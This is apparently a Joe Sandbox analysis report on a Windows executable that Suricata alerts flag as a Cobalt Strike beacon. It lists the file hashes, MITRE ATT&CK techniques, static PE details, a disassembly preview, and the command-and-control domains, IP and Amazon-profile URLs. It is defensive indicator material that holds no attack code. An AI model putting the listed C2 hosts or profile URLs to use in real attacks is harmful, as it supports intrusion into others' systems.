Source: Yara match	File source: 00000000.00000002.3255064017.00000215D7A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009284243.00000215D77F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2007898810.00000215D7757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009131449.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009082132.00000215D77DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	3 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Z9fvmHepQC.exe	6%	Virustotal		Browse
Z9fvmHepQC.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookss	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books2	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books~	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksws	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksF	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookst	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=17170	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksM	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookscoo	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books?	100%	Avira URL Cloud	malware
p0.ssl.qhimg.com.cdn.dnsv1.com	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksfl	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksyyy	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books.t	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksP	100%	Avira URL Cloud	malware
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksU6	100%	Avira URL Cloud	malware
https://bytecodealliance.org/security.	0%	Avira URL Cloud	safe
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksxyy	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
itn6qp3m.slt.sched.tdnsv8.com	42.177.83.107	true	true		unknown
p0.ssl.qhimg.com.cdn.dnsv1.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
p0.ssl.qhimg.com.cdn.dnsv1.com	true	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=1717084268&s=3717&dc_ref=http%3A%2F%2Fupdate.firefox.com.cn	false		high
http://p0.ssl.qhimg.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksws	Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookscoo	Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/bytecodealliance/wasmtime/issues/1271	Z9fvmHepQC.exe	false		high
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books2	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=17170	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B6A000.00000004.00000020.00020000.00000000.sdmp, Z9fvmHepQC.exe, 00000000.00000002.3255702876.00000215D7D7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookss	Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookst	Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksF	Z9fvmHepQC.exe, 00000000.00000002.3254282764.00000215D7799000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/bytecodealliance/wasmtime/issues/6530znI	Z9fvmHepQC.exe	false		high
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksM	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books~	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books?	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/bytecodealliance/wasmtime/issues/6530znCn	Z9fvmHepQC.exe, 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmp	false		high
https://github.com/bytecodealliance/wasmtime/issues/677	Z9fvmHepQC.exe	false		high
https://github.com/bytecodealliance/wasmtime/issues/6530	Z9fvmHepQC.exe	false		high
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksU6	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksP	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksf	Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bytecodealliance.org/security.	Z9fvmHepQC.exe	false	Avira URL Cloud: safe	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books.t	Z9fvmHepQC.exe, 00000000.00000002.3254837540.00000215D7915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksfl	Z9fvmHepQC.exe, 00000000.00000002.3255579911.00000215D7CF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksxyy	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksyyy	Z9fvmHepQC.exe, 00000000.00000002.3255217619.00000215D7B6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
42.177.83.107	itn6qp3m.slt.sched.tdnsv8.com	China		4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582290
Start date and time:	2024-12-30 09:14:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Z9fvmHepQC.exe renamed because original name is a hash value
Original Sample Name:	aab7bbb7b70a920a79c2c32126bf96fc7fb967938e49f70eb316379203452f1a.exe
Detection:	MAL
Classification:	mal96.troj.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 58% Number of executed functions: 30 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	botx.mips.elf	Get hash	malicious	Mirai	Browse	42.59.176.77
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	113.204.27.53
	botx.x86.elf	Get hash	malicious	Mirai	Browse	153.6.5.145
	botx.ppc.elf	Get hash	malicious	Mirai	Browse	39.79.186.23
	botx.arm7.elf	Get hash	malicious	Mirai	Browse	221.198.151.168
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	110.251.74.242
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	113.58.178.67
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	101.29.237.45
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	221.211.142.255
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	123.9.242.148

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.712181218459073
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	Z9fvmHepQC.exe
File size:	5'258'240 bytes
MD5:	1e53f1eafb546110a915ac383181aaa6
SHA1:	78b5bb994fb9e60883c01cd62375557686be3205
SHA256:	aab7bbb7b70a920a79c2c32126bf96fc7fb967938e49f70eb316379203452f1a
SHA512:	2db23316740ea49878cbe577582643302fb9cf117950880b86bcbdd3fd4d9c611b004da6d15e3aa9c1a6b6b93a30692d6c1872ebef6d638c2e86049bc7eb2f21
SSDEEP:	49152:0GAyjU5rHMr7y8ZfC3AlLsgEGcIgXo46Vqy0b4gyaBKf8RfpqLGHRQWbE4LPy1QO:myj9xM80RrFzxSKb6AE0d
TLSH:	49367D47E2A480E9C06EC1B5835BA733FA32BC484524B69F5BD46B222F35F506F0E759
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g...............).T3..8P................@..............................P...... Q...`... ............................

File Icon


Icon Hash:	6d8e176d712bce6d

Static PE Info

General

Entrypoint:	0x1400013d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6715D9A8 [Mon Oct 21 04:33:44 2024 UTC]
TLS Callbacks:	0x4013f970, 0x1, 0x402e11e0, 0x1, 0x402e11b0, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ff4a479ffc7eaa169c7e35063db6034b

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [004B9055h]
mov dword ptr [eax], 00000001h
call 00007F2B192FE0EFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [004B9035h]
mov dword ptr [eax], 00000000h
call 00007F2B192FE0CFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F2B195DD974h
dec eax
cmp eax, 01h
sbb eax, eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F2B192FE329h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec esp
mov edx, dword ptr [ecx+08h]
dec ecx
mov dword ptr [edx+18h], ebp
dec esp
mov ebx, dword ptr [esp]
dec ebp
mov dword ptr [edx+20h], ebx
jmp 00007F2B19560869h
nop word ptr [eax+eax+00000000h]
nop
dec esp
mov edx, dword ptr [ecx+08h]
dec ecx
mov dword ptr [edx+18h], ebp
dec esp
mov ebx, dword ptr [esp]
dec ebp
mov dword ptr [edx+20h], ebx
jmp 00007F2B19560849h
nop word ptr [eax+eax+00000000h]
nop
dec esp
mov edx, dword ptr [ecx+08h]
dec ecx
mov dword ptr [edx+18h], ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4f1000	0x8e	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f2000	0x11fc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f6000	0x10d28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4bf000	0x15dec	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x507000	0x58e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4ba080	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4f2468	0x3c8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3353b8	0x335400	9ca39f66a72f23dffd12989a4959a5e8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x337000	0x2f0	0x400	b18cc1571716d301778abaa5bed2e0ae	False	0.130859375	data	1.0965833449619233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x338000	0x185290	0x185400	dc1d08b194d0a48da4b183185824aa4a	False	0.6050271957289659	data	6.404834576120108	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x4be000	0x3f0	0x400	e8c8aeeee68029ffc471d7c12093ebf8	False	0.1826171875	Sony PlayStation PSX image, 4-Bit, Pixel at (31745,272) Size=0x0	1.9521024093572519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x4bf000	0x15dec	0x15e00	a5f0d69274704f9dbc5f3418bacf55bb	False	0.4614732142857143	data	6.399795629980994	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x4d5000	0x1a9f8	0x1aa00	28e6a9d1199ef4f4092ffe9075748445	False	0.1682713468309859	data	4.772952445077927	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x4f0000	0x400	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x4f1000	0x8e	0x200	61fc4a4820d008ba6e76900b49be74e6	False	0.244140625	data	1.8156966126718577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x4f2000	0x11fc	0x1200	272a1a0b4a2d759178573716e671e9d5	False	0.3155381944444444	data	4.365994715992988	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x4f4000	0x68	0x200	5f2039b6a3d1dd807380a2bae0a05135	False	0.076171875	data	0.40517793218226683	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x4f5000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f6000	0x10d28	0x10d28	7b53bcdbab56d397017dfa66a7d28638	False	0.3604725415070243	data	4.221037485357578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x507000	0x58e0	0x5a00	dc5780eb2bb01c0c023713aee7a1782d	False	0.39618055555555554	data	5.449513647436446	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4f60f8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.35917721518987344
RT_GROUP_ICON	0x506920	0x14	data	English	United States	1.15
RT_VERSION	0x506938	0x3dc	data	English	United States	0.4058704453441296

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwindEx, VirtualQuery, __C_specific_handler
msvcrt.dll	__getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _fpreset, _initterm, _onexit, _setjmp, abort, calloc, ceil, ceilf, exit, floor, floorf, fprintf, free, fwrite, longjmp, malloc, memcmp, memcpy, memmove, memset, signal, strlen, strncmp, vfprintf
kernel32.dll	AddVectoredExceptionHandler, CloseHandle, CreateDirectoryW, CreateFileMappingA, CreateFileW, CreateThread, CreateToolhelp32Snapshot, DuplicateHandle, FindClose, FindFirstFileW, FlushInstructionCache, FormatMessageW, FreeLibrary, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, GetEnvironmentVariableW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFullPathNameW, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessHeap, GetStdHandle, GetSystemInfo, HeapAlloc, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, LoadLibraryExA, MapViewOfFile, Module32FirstW, Module32NextW, MoveFileExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RtlAddFunctionTable, RtlCaptureContext, RtlDeleteFunctionTable, RtlLookupFunctionEntry, RtlVirtualUnwind, SetFileInformationByHandle, SetLastError, SetThreadStackGuarantee, SetUnhandledExceptionFilter, Sleep, SwitchToFiber, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnmapViewOfFile, VirtualAlloc, VirtualFree, VirtualProtect, WaitForSingleObject, WriteConsoleW
ntdll.dll	NtReadFile, NtWriteFile, RtlNtStatusToDosError
oleaut32.dll	GetErrorInfo, SysFreeString, SysStringLen
api-ms-win-core-synch-l1-2-0.dll	WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
bcryptprimitives.dll	ProcessPrng

Exports

Name	Ordinal	Address
__jit_debug_descriptor	1	0x1403372d0
__jit_debug_register_code	2	0x1403362c0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T09:15:03.189163+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:03.189163+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:08.957855+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:08.957855+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:20.538352+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:20.538352+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:26.104437+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:26.104437+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:32.041417+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:32.041417+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:37.604834+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:37.604834+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:43.173422+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:43.173422+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:48.765587+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:48.765587+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:54.381770+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:54.381770+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:59.987682+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:59.987682+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:05.624457+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:05.624457+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:11.223521+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:11.223521+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:17.157487+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:17.157487+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
